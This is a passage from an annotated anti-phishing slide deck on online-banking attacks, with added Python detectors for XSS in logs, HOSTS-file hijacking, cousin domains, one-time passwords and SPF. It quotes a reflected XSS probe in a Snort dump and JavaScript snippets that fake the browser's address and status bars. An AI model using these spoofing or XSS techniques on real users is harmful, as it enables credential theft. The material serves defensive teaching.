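    '.value;%22%3E HTTP/1.1" 200 4058 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
    '10.0.0.7 - - [14/Oct/2004:10:40:22 +0800] "GET /banklogin.jsp HTTP/1.1" 200 4058 '
    '"http://61.10.120.200:2784/inetbank/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '203.0.113.9 - - [14/Oct/2004:10:41:05 +0800] "GET /img/spacer-9f3a.gif HTTP/1.1" 404 719 '
    '"-" "Wget/1.9"',
    '192.168.1.20 - - [14/Oct/2004:10:42:00 +0800] "GET /banklogin.jsp HTTP/1.1" 200 4058 '
    '"http://www.pisabank.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
]


def parse_line(line):
    """Dict of the log fields, or None if the line is not in common/combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse(entry):
    """Indicator names that one parsed entry triggers (empty list if it looks normal)."""
    target = urlsplit(entry["target"])
    path = unquote(target.path)
    query = unquote(target.query)
    hits = []
    if path in HONEYPOT_PATHS:
        hits.append("honeypot-link")          # slide 45: copycat mirroring the site
    if XSS_RE.search(query):
        hits.append("xss-in-query")           # slide 78: reflected payload
    ref = entry.get("referer")
    if ref and ref != "-" and path in LOGIN_PATHS:
        ref_host = (urlsplit(ref).hostname or "").lower()
        if ref_host not in OUR_HOSTS:
            hits.append("foreign-referer-to-login")   # slide 45: face lift / framing
    return hits


def scan(lines):
    """(client ip, indicators, decoded target) for every line that triggers something."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        hits = analyse(entry)
        if hits:
            findings.append((entry["ip"], hits, unquote(entry["target"])))
    return findings


if __name__ == "__main__":
    for ip, hits, target in scan(SAMPLE_LOG):
        print(ip, hits, target[:70])
```

The query string is decoded before matching because the payload arrives %-encoded, as slide 78 shows; matching the raw line would miss it. The handler list is deliberately short so that ordinary parameter names such as "online=" do not trip the rule.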
  • 79. XSS – Detection: XSS exploits can also be detected by a network-based Intrusion Detection System (IDS), e.g. (Snort alert):
      [**] WEB-MISC cross site scripting attempt [**]
      10/21-23:04:54.960511 192.168.1.152:3341 -> 192.168.1.100:80
      TCP TTL:128 TOS:0x0 ID:28082 IpLen:20 DgmLen:307 DF
      ***AP*** Seq: 0xAB1F9A5C  Ack: 0xEFB2E94B  Win: 0x4470  TcpLen: 20
      47 45 54 20 2F 62 61 6E 6B 6C 6F 67 69 6E 2E 6A  GET /banklogin.j
      73 70 3F 65 72 72 3D 3C 73 63 72 69 70 74 3E 61  sp?err=<script>a
      6C 65 72 74 28 27 58 53 53 27 29 3C 2F 73 63 72  lert('XSS')</scr
      69 70 74 3E 20 48 54 54 50 2F 31 2E 31 0D 0A 41  ipt> HTTP/1.1..A
      63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65  ccept: */*..Acce
      70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D  pt-Language: zh-
      68 6B 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20  hk..User-Agent:
      4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D  Mozilla/4.0 (com
      70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E  patible; MSIE 6.
      30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E  0; Windows NT 5.
      30 29 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 70 69  0)..Host: www.pi
      73 61 62 61 6E 6B 2E 63 6F 6D 0D 0A 43 6F 6E 6E  sabank.com..Conn
      65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69  ection: Keep-Ali
      76 65 0D 0A 43 6F 6F 6B 69 65 3A 20 4A 53 45 53  ve..Cookie: JSES
      53 49 4F 4E 49 44 3D 32 42 43 43 39 44 45 36 43  SIONID=2BCC9DE6C
      44 43 46 45 44 44 37 45 32 35 42 43 46 33 44 36  DCFEDD7E25BCF3D6
      38 39 35 38 30 46 32 0D 0A 0D 0A                 89580F2....
      =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
  • 80. 2.5 Visual Spoofing
      • Targets the web browser interface
      • Displays a fake menu bar, status bar or dialogue box on the web browser
        – The address bar displays a fake URL address
        – The status bar displays the golden "lock" icon indicating a secure SSL session, which has often been cited as the differentiator between legitimate sites and scams
        – The download or installation dialogue box shows fake information
  • 81. How it works? Graphic substitution approach
      1. The bogus web page is opened without the menu bar and status bar:
          window.open("bogus.htm", "_blank", "height=700, width=683, location=no, menubar=no, toolbar=no, status=no, resizable=no, scrollbars=no");
      2. Images of a menu bar and of a status bar (with the golden "lock" icon) are displayed at the top and bottom of the bogus web page, disguised as part of the browser user interface
  • 82. Graphic Substitution Approach (diagram: a header image imitating the browser's menu and address bar, the bogus web content, and a footer image imitating the status bar)
  • 83. Graphic Substitution Approach
      3. Combined with the JavaScript calls window.createPopup() and popup.show(), the attacker can cover the user's entire desktop and construct a fake interface to capture and manipulate what the user sees:
          op = window.createPopup();
          op.document.body.innerHTML = "...html...";
          op.show(0, 0, screen.width, screen.height, document.body);
  • 84. Browser UI Rebuild Approach
      1. The bogus web page is opened without the menu bar and status bar
      2. Some browser user interface functions (including the certificate view function) are rebuilt on the bogus web page through downloaded XUL (XML-based User interface Language: a standards-based language developed by mozilla.org to create cross-platform user interfaces for Mozilla-based products such as the browser)
      Reference: http://www.nd.edu/~jsmith30/xul/test/spoof.html
  • 85. Browser UI Rebuild Approach (screenshot)
  • 86. Overriding Page Content Approach
      • The IE browser allows the creation of chromeless windows: screen objects that do not have the normal borders and other controls attached to them. Through JavaScript, they can be positioned to hide or replace (by "sitting on top" of) underlying content.
      • Attackers make use of these chromeless windows to spoof the graphical components of the browser, such as the URL address bar and the dialogue boxes for file download, software installation and bookmarks.
  • 87. 2.5 Visual Spoofing – Defense
      – Keep your web browser updated
      – Disable the JavaScript functions that hide your web browser's menu and status bar
      – Check the page info and properties of the viewed web page before proceeding
      – Put a distinguishing mark on the browser UI, so that an imitation drawn inside the page can be told apart from the real thing
  • 88. Demonstration 4: Visual Spoofing
      • Graphical substitution
      • FireFox browser UI rebuild approach
      • Chromeless window
  • 89. 2.6 Other Attacks: Trojan, Keylogger, Screen Grabber
      The attacker can lure the victim into installing a Trojan horse program through a bogus software patch or update web page. Once the victim has installed the Trojan horse program, the attacker can closely monitor the victim's PC activities by capturing its keystrokes and screen display.
        – Keylogger: captures the victim's keystrokes in all windows
        – Screen grabber: screen dumps, or even video streams, the victim's screen display
  • 90. Demonstration 5: Keylogger and Screen Grabber using BackOrifice
  • 91. 2.6 Other Attacks: Man in the Middle Attack
      By poisoning the victim's DNS server, the attacker can redirect the traffic for a legitimate site to the attacker's server, where the attacker can sniff password information even in an HTTPS connection.
      (Diagram: the victim PC thinks it is talking to the legitimate web server; actually it is talking to the attacker's server, which sniffs the password information and proxies the HTTPS traffic between the victim and the legitimate web server)
  • 92. New Quiet Attack (4-Nov-2004)
      • Change of the HOSTS file
        – Captures online banking details WITHOUT requiring users to click on a website link
        – Works even if the USER TYPES IN THE URL MANUALLY
      • Working principle
        – Execution of a Trojan that modifies the HOSTS file
        – The HOSTS file overrides DNS resolution
        – The user is brought to the malicious site the next time he goes to that online transaction site
      • Defense
        – Ensure Windows Scripting Host is disabled
        – Have AV and anti-spyware software installed
      • Reference: http://www.vnunet.com/news/1159171
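Because the HOSTS file is consulted before DNS, the attack on slide 92 leaves a durable trace that a desktop-management script can look for. The Python below is an added example (not from the slides or the vnunet article): it parses hosts-file text and reports any watched banking name that has been mapped, and any other non-loopback entry, since an end-user machine normally maps nothing but localhost. The sample file content is constructed, and the watch-list of banking hostnames is an assumption.

```python
"""Check a HOSTS file for entries that hijack online-banking names (slide 92's attack).

Added example. SAMPLE_HOSTS is constructed; WATCH_DOMAINS is an assumed watch-list of
the names a bank's help desk or desktop team would care about.
"""
import ipaddress

WATCH_DOMAINS = {"www.anz.com.au", "online.xyzbank.com", "www.hsbc.com"}  # assumed

SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
61.10.120.200   www.anz.com.au          # planted by the trojan
61.10.120.200   online.xyzbank.com
192.168.1.5     fileserver              # legitimate LAN shortcut, still worth a look
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, ignoring comments and blank lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue            # malformed line; not an address at all
        for name in fields[1:]:
            yield ip, name.lower().rstrip(".")


def hosts_overrides(text, watch=WATCH_DOMAINS):
    """Suspicious entries as (ip, name, reason).

    A watched name mapped anywhere is the attack itself; any other non-loopback
    mapping is reported too, because on a normal end-user PC the file maps only
    localhost, and a LAN shortcut should at least be recognised by whoever reviews it.
    """
    findings = []
    for ip, name in parse_hosts(text):
        if name in watch:
            findings.append((str(ip), name, "watched-name-overridden"))
        elif not ip.is_loopback and name != "localhost":
            findings.append((str(ip), name, "non-loopback-entry"))
    return findings


if __name__ == "__main__":
    for ip, name, reason in hosts_overrides(SAMPLE_HOSTS):
        print(reason, name, "->", ip)
```

On Windows the file lives at %SystemRoot%\System32\drivers\etc\hosts; the check belongs in the same inventory pass that confirms Windows Scripting Host is disabled, since the vnunet report describes a script-delivered Trojan as the way the file gets edited.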
  • 93. Defense Strategies: At end user side
    • NEVER follow any link in e-mail, posted articles, chat rooms, ICQ messages, or banner advertising
    • Enable your personal firewall to allow only necessary traffic through
    • Keep your software (mail reader, web browser, virus definitions) patched and updated
    • Use PKI properly
  • 94. Defense Strategies: At server side
    • Make sure the web programs are fully tested, including input parsing and invalid input handling
    • Monitor any cousin domains created
    • Monitor any phishing e-mail or posted message targeting your organization in major search engines and your honeypot accounts
    • Monitor your web server log and identify any suspicious web pages from the Referer information
    • Provide a secure web proxy service for your customers. This web proxy can only connect to your legitimate web sites and nothing else
    • Provide secondary authentication for transactions, e.g. send a one-time password to the client through mobile SMS
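Two of the monitoring items above (cousin domains, and suspicious pages found through Referer information) use the same lookalike test, so one added example covers both. It is not part of the PISA material. A phishing page that copies the bank's site usually still loads images from, or links to, the real server, so the real server's access log records the phishing page's URL in the Referer field. The log lines, hostnames and addresses are constructed.

```python
"""Flag cousin domains and phishing pages seen in web-server Referer headers.

Added example, not from the PISA slides. All hostnames, IPs and log lines
are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

LEGIT_DOMAIN = "onlinebank.example"     # constructed: the real site
BRAND = "onlinebank"                    # constructed brand token

# Apache/nginx "combined" format: ip - - [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed access-log sample: lines 2 and 3 come from lookalike sites.
SAMPLE_LOG = """\
198.51.100.10 - - [04/Nov/2004:10:00:01 +0800] "GET /images/logo.gif HTTP/1.1" 200 5120 "http://onlinebank.example/login" "Mozilla/4.0"
198.51.100.11 - - [04/Nov/2004:10:00:07 +0800] "GET /images/logo.gif HTTP/1.1" 200 5120 "http://onlinebank-secure.example/login.htm" "Mozilla/4.0"
198.51.100.12 - - [04/Nov/2004:10:00:09 +0800] "GET /images/logo.gif HTTP/1.1" 200 5120 "http://onlimebank.example/verify.php" "Mozilla/4.0"
198.51.100.13 - - [04/Nov/2004:10:00:12 +0800] "GET /images/logo.gif HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
198.51.100.14 - - [04/Nov/2004:10:00:15 +0800] "GET /images/logo.gif HTTP/1.1" 200 5120 "http://news.example/article" "Mozilla/4.0"
"""


def levenshtein(a, b):
    """Edit distance; a small value against the real domain means a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_cousin_domain(host, legit=LEGIT_DOMAIN, brand=BRAND, max_dist=2):
    """True for hosts that imitate the legitimate domain but are not it."""
    host = host.lower().rstrip(".")
    if host == legit or host.endswith("." + legit):
        return False                    # the real site or one of its subdomains
    if brand in host:
        return True                     # e.g. onlinebank-secure.example
    bare = host[4:] if host.startswith("www.") else host
    return levenshtein(bare, legit) <= max_dist   # e.g. onlimebank.example


def suspicious_referers(log_text):
    """Return [(client_ip, referer_host)] for hits whose Referer is a cousin domain."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["referer"] == "-":
            continue                    # unparsable line or no Referer sent
        host = urlsplit(m["referer"]).hostname or ""
        if host and is_cousin_domain(host):
            hits.append((m["ip"], host))
    return hits


if __name__ == "__main__":
    for ip, host in suspicious_referers(SAMPLE_LOG):
        print(f"possible phishing page referring to us: {host} (client {ip})")
```

The same `is_cousin_domain` test can be run over a daily feed of newly registered domains to cover the "monitor any cousin domains created" item; in practice the brand-substring test catches far more than the edit-distance test, which is kept narrow (distance 2) to avoid flooding the operator with unrelated domains.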
  • 95. Defense Strategies: At system and network admin side
    • Deploy anti-spamming and anti-virus measures, e.g. black/white lists, keyword lists, semantic analysis, various rules and characteristics, Bayesian filtering, challenge-response filtering, SMTP session verification, TurnTide anti-spam router, etc.
    • Deploy Firewall, Intrusion Detection System and Intrusion Prevention System to block attacks and Trojan backdoor connections
    • Put all non-server machines in private IP networks
    • Educate the users and make sure they stay with the updated software patches
    At the software vendor side
    • Do not assume users have certain security knowledge or awareness to use their products safely and wisely
    • Do not lower the security level in their product's default settings
    • Don't just make money. Spend more time fixing the bugs and fully testing the product
  • 96. The Picture of Trust
    [Diagram: layers of trust between Client, IT Infrastructure and Server, with the attack that undermines each layer]
    – Perception: social engineering; look and feel (Cousin URL); message and tone (Face Lift)
    – Trust: branding; physical settings
    – CA: weak operation? Operational security; validation; chain of trust; certificate & revocation
    – Email: sender validation
    – Application: XSS vulnerabilities; apps
    – Browser: visual spoofing
    – Transport (Host): SSL; MITM
    – Network (Internet): DNS, Hosts file; routing; DNS poisoning
    – Link (LAN): MITM, ARP sniffing; link resolution
  • 97. Defense Strategies
    • Policy and User Education
    • Prevention
    • Detection
    • Incident Response and Collaboration
  • 98. 3.1 Policy and User Education
    • Regulation of bogus web sites
      – HKMA Guideline
        • Circular on monitoring Online Banking
      – Regulating the use of domain names
        • HKMA and HKIRC cooperate in regulating the use of the words “bank” and “banque” in “.hk” domains
        • Is a further regulation to mandate all authorized banking institutions to use “.bank.hk” a useful strategy?
          – Note: it still cannot stop techniques like “Visual Spoofing”
    • Humans are the weakest link
      – Trust too easily
  • 99. 3.1 User Education
    • Consumer Education
      – Pamphlet “Internet Banking – Keeping Your Money Safe”
        • by HKAB (Hong Kong Association of Banks) http://www.hkab.org.hk/PDF/customer_info/ebanking_e.pdf
      – TV and Radio programs
        • by HKMA and HKPF
      – Public seminars
        • by HKCERT
      – Alerts on some bank web sites
  • 100. 3.2 Prevention: Technical
    • HKMA announced in June 2004 that within 12 months, all authorized institutions should deploy two-factor authentication in high risk transactions
      – One-time password (e.g. secure ID token, SMS one-time password)
      – Digital certificate in Smart ID Card
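How a one-time password second factor of the kind listed above works on the server side, as an added example that is not part of the PISA material. It implements the HMAC-based one-time password algorithm of RFC 4226 (HOTP), which is what counter-based tokens and many SMS OTP systems use; the shared secret is the RFC's published test-vector secret, not a real key, and the `OtpAccount` class and its window size are this example's own design.

```python
"""One-time passwords for second-factor authentication (HOTP, RFC 4226).

Added example, not from the PISA slides. Shows how a server generates a
code (for an SMS) and verifies what the customer types back, with a small
look-ahead window so that a token pressed a few times without logging in
still works, and with replay of a used code refused.
"""
import hashlib
import hmac
import struct

# Shared secret from RFC 4226 Appendix D test vectors; never reuse a
# published secret for a real account.
RFC4226_TEST_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6):
    """HOTP value for a secret and a counter (8-byte big-endian), RFC 4226 §5.3."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


class OtpAccount:
    """Server-side OTP state for one customer (example design, not a standard API)."""

    def __init__(self, secret, window=3):
        self.secret = secret
        self.counter = 0          # next counter value the server expects
        self.window = window      # how many skipped codes the server tolerates

    def issue(self):
        """Code for the next expected counter, e.g. to send by SMS.

        Resending before use yields the same code, so a lost SMS can simply
        be sent again without desynchronising the customer.
        """
        return hotp(self.secret, self.counter)

    def verify(self, submitted):
        """Accept a code that matches one of the next `window` counters.

        On success the counter moves past the matched value, consuming it
        and any skipped ones, so a captured code cannot be replayed.
        """
        for c in range(self.counter, self.counter + self.window):
            expected = hotp(self.secret, c)
            if hmac.compare_digest(expected.encode(), submitted.encode()):
                self.counter = c + 1
                return True
        return False


if __name__ == "__main__":
    acct = OtpAccount(RFC4226_TEST_SECRET)
    code = acct.issue()
    print("SMS code:", code, "accepted:", acct.verify(code),
          "replay accepted:", acct.verify(code))
```

The OTP only proves possession of the phone or token; it does not stop the man-in-the-middle proxy of slide 91 from relaying the code in real time, which is why the HKMA requirement pairs it with the other measures in this section.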
  • 101. 3.2 Other Prevention & Detection
    • See previous sections on specific attacks
  • 102. 3.4 Incident Response and Collaboration
    • Report and Alert
      – SFC (Securities and Futures Commission) rewards the reporting of fraudulent copycat websites and phishing scams targeting Hong Kong investors.
        • Smart Investor Award http://www.hksfc.org.hk/eng/investor/html/smart_investor_award.htm
      – HKMA and SFC publish unregistered financial and stock transaction web sites
        • http://www.hkma.gov.hk
        • http://www.hksfc.org.hk/chi/investor/html/unlicensed_overseas_comp.htm
      – Quick reaction and publishing of news in media and press to alert the public
  • 103. 3.4 Incident Response and Collaboration
    • Local Collaboration
      – Police, HKCERT and ISPs cooperate to close down bogus web sites in Hong Kong
      – Police, HKMA and HKAB have a standing collaboration body, meeting regularly on banking fraud prevention and response
  • 104. 3.4 Incident Response and Collaboration
    • Cross Border Collaboration
      – Police play an important role in cross-border crimes like phishing
      – CERT teams around the world are developing close collaboration in information exchange and pinning down of bogus websites
    [Figure: map of CSIRTs, Global and Asia Pacific: http://www.cert.org/csirts/images/map-full.gif]
  • 105. 3.5 Long Term Development (Technology Infrastructure): PHISHING & SPAM
    One of the core issues: how to validate the identity of the sender and the sender domain, and whether the sending mail server is authorized?
    • In the current Internet mail infrastructure implementation, there is a flaw in the validation of the sender
    Plausible but not widely implemented methods of validation
    • Sender Validation
      – Use Digital Signature (S/MIME or PGP)
    • Authenticated SMTP to minimize abuse of Open Mail Relays
      – RFC2554 - SMTP Service Extension for Authentication
      – RFC2487 - SMTP Service Extension for Secure SMTP over TLS
  • 106. 3.5 Long Term Development (Technology Infrastructure)
    • Domain Validation (works at DNS level)
      – Standards based
        • Reverse DNS Lookup
      – Proprietary Solutions
        • AOL: SPF Sender ID
        • Microsoft: Caller ID
        • Yahoo: Domain Keys
  • 107. Sender Policy Framework (SPF)
    [Diagram: Sender, Sender Mail Server, Recipient Mail Gateway, Recipient; the Recipient Mail Gateway queries the DNS server of SENDER.COM]
    1. Sender sends out email from SENDER.COM
    2. Recipient Mail Gateway issues a DNS query to the DNS server of SENDER.COM, asking for the list of authorized IP addresses of mail servers
    3. DNS server returns a list of authorized IP addresses of mail servers for SENDER.COM
    4. Check if the Sender Mail Server is in the authorized IP address list. If so, the mail server is authorized and the mail is forwarded to the recipient's mailbox
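The four steps of the SPF diagram carried through in code, as an added example that is not part of the PISA material. Steps 2 and 3 (the DNS query for the sender domain's policy) are replaced by an in-memory dictionary of constructed TXT records so the example runs offline; step 4 is a mechanism evaluator that understands the `ip4`, `ip6`, `include` and `all` mechanisms and the four qualifiers. The domains and addresses are constructed; a real checker would also resolve the `a`, `mx`, `ptr` and `exists` mechanisms and use an actual DNS resolver.

```python
"""Evaluate an SPF record against the IP address of the sending mail server.

Added example, not from the PISA slides. Domains, TXT records and
addresses are constructed; FAKE_DNS_TXT stands in for "DNS server of
SENDER.COM" on the slide.
"""
import ipaddress

# Constructed stand-in for DNS TXT lookups (steps 2 and 3 of the diagram).
FAKE_DNS_TXT = {
    "sender.com": "v=spf1 ip4:192.0.2.0/24 ip6:2001:db8::/32 include:bulk.sender.com -all",
    "bulk.sender.com": "v=spf1 ip4:198.51.100.25 ~all",
    "nospf.example": "some unrelated txt record",
}

# Result produced when a mechanism with the given qualifier matches.
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def lookup_spf(domain, dns=FAKE_DNS_TXT):
    """Steps 2/3: return the domain's SPF record, or None if it publishes none."""
    txt = dns.get(domain.lower())
    if txt and txt.lower().startswith("v=spf1"):
        return txt
    return None


def check_spf(sender_ip, domain, dns=FAKE_DNS_TXT, depth=0):
    """Step 4: pass/fail/softfail/neutral/none/permerror for sender_ip and domain."""
    if depth > 10:                      # RFC 7208 limits DNS-querying terms to 10
        return "permerror"
    record = lookup_spf(domain, dns)
    if record is None:
        return "none"                   # domain publishes no policy
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:     # skip the "v=spf1" version tag
        qualifier = "+"                 # an unqualified mechanism means pass
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        name = name.lower()
        matched = False
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            net = ipaddress.ip_network(value, strict=False)
            matched = ip.version == net.version and ip in net
        elif name == "include":
            # include matches only when the referenced domain's policy passes
            matched = check_spf(sender_ip, value, dns, depth + 1) == "pass"
        # a, mx, ptr and exists are not implemented in this example
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"                    # nothing matched and no "all" term


if __name__ == "__main__":
    for ip in ("192.0.2.10", "198.51.100.25", "203.0.113.9", "2001:db8::1"):
        print(ip, "->", check_spf(ip, "sender.com"))
```

The gateway acts on the result: "fail" with a `-all` policy is the case the slide's step 4 rejects, "softfail" from `~all` is normally scored rather than bounced, and "none" means the sender domain gives the gateway nothing to check, which is why the slide calls SPF plausible but not yet widely deployed.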
  • 108. Proprietary Domain Validation
    • Caller ID
      – “XML version of SPF” with more options
    • Domain Keys
      – Uses PKI. Validates sender identity AND message integrity
    • Recent Development
      – Domain Keys was submitted as an RFC to IETF
      – SPF merged with Caller ID into Sender ID.
      – Sender ID was submitted to IETF as an RFC in July 2004; it got rejected in Oct 2004 due to compatibility and IP issues. Microsoft has re-submitted it with amendments. The industry is still discussing the new amendment.
  • 109. 3.5 Long Term Development (Legislation): PHISHING & SPAM
    – Legislate on cross-border jurisdiction, and establish a mutually accepted process to handle phishing and spamming
    – Legislate on anti-spam, to reduce Open Mail Relays and Directory Harvesting Attacks
  • 110. Conclusion
    • Phishing adversely impacts the growth of e-Commerce
    • Phishermen are now using both old social engineering tricks and more advanced technologies.
    • Should adopt multi-dimensional anti-phishing strategies
      – User Education, Prevention, Detection, Incident Response and Notification
      – Collaboration of law enforcement and the business sector, and crossing the border, are vital elements of success.
    • Hitting SPAM can hit Phishing. There is a need for legislative and technological reforms.